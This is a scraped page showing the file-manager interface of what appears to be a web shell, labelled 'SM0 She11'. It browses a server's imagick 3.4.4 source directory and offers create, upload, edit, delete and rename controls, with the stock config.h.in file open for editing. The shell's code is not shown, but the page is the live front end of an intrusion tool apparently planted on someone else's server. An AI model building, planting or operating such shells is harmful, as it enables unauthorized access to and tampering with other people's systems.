SM0 She11
Path:
/
/
usr
/
local
/
src
/
imagick-3.4.4
Full Path (server): /usr/local/src/imagick-3.4.4
Create Fil3
Upl04d Fil3
📄 .deps
[E]
[D]
[R]
📁 .libs
Open
[D]
[R]
📄 CREDITS
[E]
[D]
[R]
📄 ChangeLog
[E]
[D]
[R]
📄 LICENSE
[E]
[D]
[R]
📄 Makefile
[E]
[D]
[R]
📄 Makefile.fragments
[E]
[D]
[R]
📄 Makefile.global
[E]
[D]
[R]
📄 Makefile.objects
[E]
[D]
[R]
📄 acinclude.m4
[E]
[D]
[R]
📄 aclocal.m4
[E]
[D]
[R]
📁 autom4te.cache
Open
[D]
[R]
📁 build
Open
[D]
[R]
📄 config.guess
[E]
[D]
[R]
📄 config.h
[E]
[D]
[R]
📄 config.h.in
[E]
[D]
[R]
📄 config.log
[E]
[D]
[R]
📄 config.m4
[E]
[D]
[R]
📄 config.nice
[E]
[D]
[R]
📄 config.status
[E]
[D]
[R]
📄 config.sub
[E]
[D]
[R]
📄 config.w32
[E]
[D]
[R]
📄 configure
[E]
[D]
[R]
📄 configure.in
[E]
[D]
[R]
📁 examples
Open
[D]
[R]
📄 imagemagick.m4
[E]
[D]
[R]
📄 imagick.c
[E]
[D]
[R]
📄 imagick.la
[E]
[D]
[R]
📄 imagick.lo
[E]
[D]
[R]
📄 imagick_class.c
[E]
[D]
[R]
📄 imagick_class.lo
[E]
[D]
[R]
📄 imagick_file.c
[E]
[D]
[R]
📄 imagick_file.lo
[E]
[D]
[R]
📄 imagick_helpers.c
[E]
[D]
[R]
📄 imagick_helpers.lo
[E]
[D]
[R]
📄 imagickdraw_class.c
[E]
[D]
[R]
📄 imagickdraw_class.lo
[E]
[D]
[R]
📄 imagickkernel_class.c
[E]
[D]
[R]
📄 imagickkernel_class.lo
[E]
[D]
[R]
📄 imagickpixel_class.c
[E]
[D]
[R]
📄 imagickpixel_class.lo
[E]
[D]
[R]
📄 imagickpixeliterator_class.c
[E]
[D]
[R]
📄 imagickpixeliterator_class.lo
[E]
[D]
[R]
📁 include
Open
[D]
[R]
📄 install-sh
[E]
[D]
[R]
📄 libtool
[E]
[D]
[R]
📄 ltmain.sh
[E]
[D]
[R]
📄 missing
[E]
[D]
[R]
📄 mkinstalldirs
[E]
[D]
[R]
📁 modules
Open
[D]
[R]
📄 php_imagick.h
[E]
[D]
[R]
📄 php_imagick_defs.h
[E]
[D]
[R]
📄 php_imagick_file.h
[E]
[D]
[R]
📄 php_imagick_helpers.h
[E]
[D]
[R]
📄 php_imagick_macros.h
[E]
[D]
[R]
📄 php_imagick_shared.h
[E]
[D]
[R]
📄 run-tests.php
[E]
[D]
[R]
📄 shim_im6_to_im7.c
[E]
[D]
[R]
📄 shim_im6_to_im7.h
[E]
[D]
[R]
📄 shim_im6_to_im7.lo
[E]
[D]
[R]
📁 tests
Open
[D]
[R]
Editing: config.h.in
/* config.h.in. Generated from configure.in by autoheader. */ /* Whether to build imagick as dynamic module */ #undef COMPILE_DL_IMAGICK /* Define to 1 if you have the <dlfcn.h> header file. */ #undef HAVE_DLFCN_H /* */ #undef HAVE_IMAGICK /* Define to 1 if you have the <inttypes.h> header file. */ #undef HAVE_INTTYPES_H /* */ #undef HAVE_MAGICKGETVERSION /* Define to 1 if you have the <memory.h> header file. */ #undef HAVE_MEMORY_H /* Define to 1 if you have the <stdint.h> header file. */ #undef HAVE_STDINT_H /* Define to 1 if you have the <stdlib.h> header file. */ #undef HAVE_STDLIB_H /* Define to 1 if you have the <strings.h> header file. */ #undef HAVE_STRINGS_H /* Define to 1 if you have the <string.h> header file. */ #undef HAVE_STRING_H /* Define to 1 if you have the <sys/stat.h> header file. */ #undef HAVE_SYS_STAT_H /* Define to 1 if you have the <sys/types.h> header file. */ #undef HAVE_SYS_TYPES_H /* Define to 1 if you have the <unistd.h> header file. */ #undef HAVE_UNISTD_H /* ImageMagick old style header */ #undef IM_MAGICKWAND_HEADER_STYLE_OLD /* ImageMagick 7.x style header */ #undef IM_MAGICKWAND_HEADER_STYLE_SEVEN /* ImageMagick 6.x style header */ #undef IM_MAGICKWAND_HEADER_STYLE_SIX /* Define to 1 if your C compiler doesn't accept -c and -o together. */ #undef NO_MINUS_C_MINUS_O /* Define to the address where bug reports for this package should be sent. */ #undef PACKAGE_BUGREPORT /* Define to the full name of this package. */ #undef PACKAGE_NAME /* Define to the full name and version of this package. */ #undef PACKAGE_STRING /* Define to the one symbol short name of this package. */ #undef PACKAGE_TARNAME /* Define to the home page for this package. */ #undef PACKAGE_URL /* Define to the version of this package. */ #undef PACKAGE_VERSION /* Define to 1 if you have the ANSI C header files. */ #undef STDC_HEADERS
Save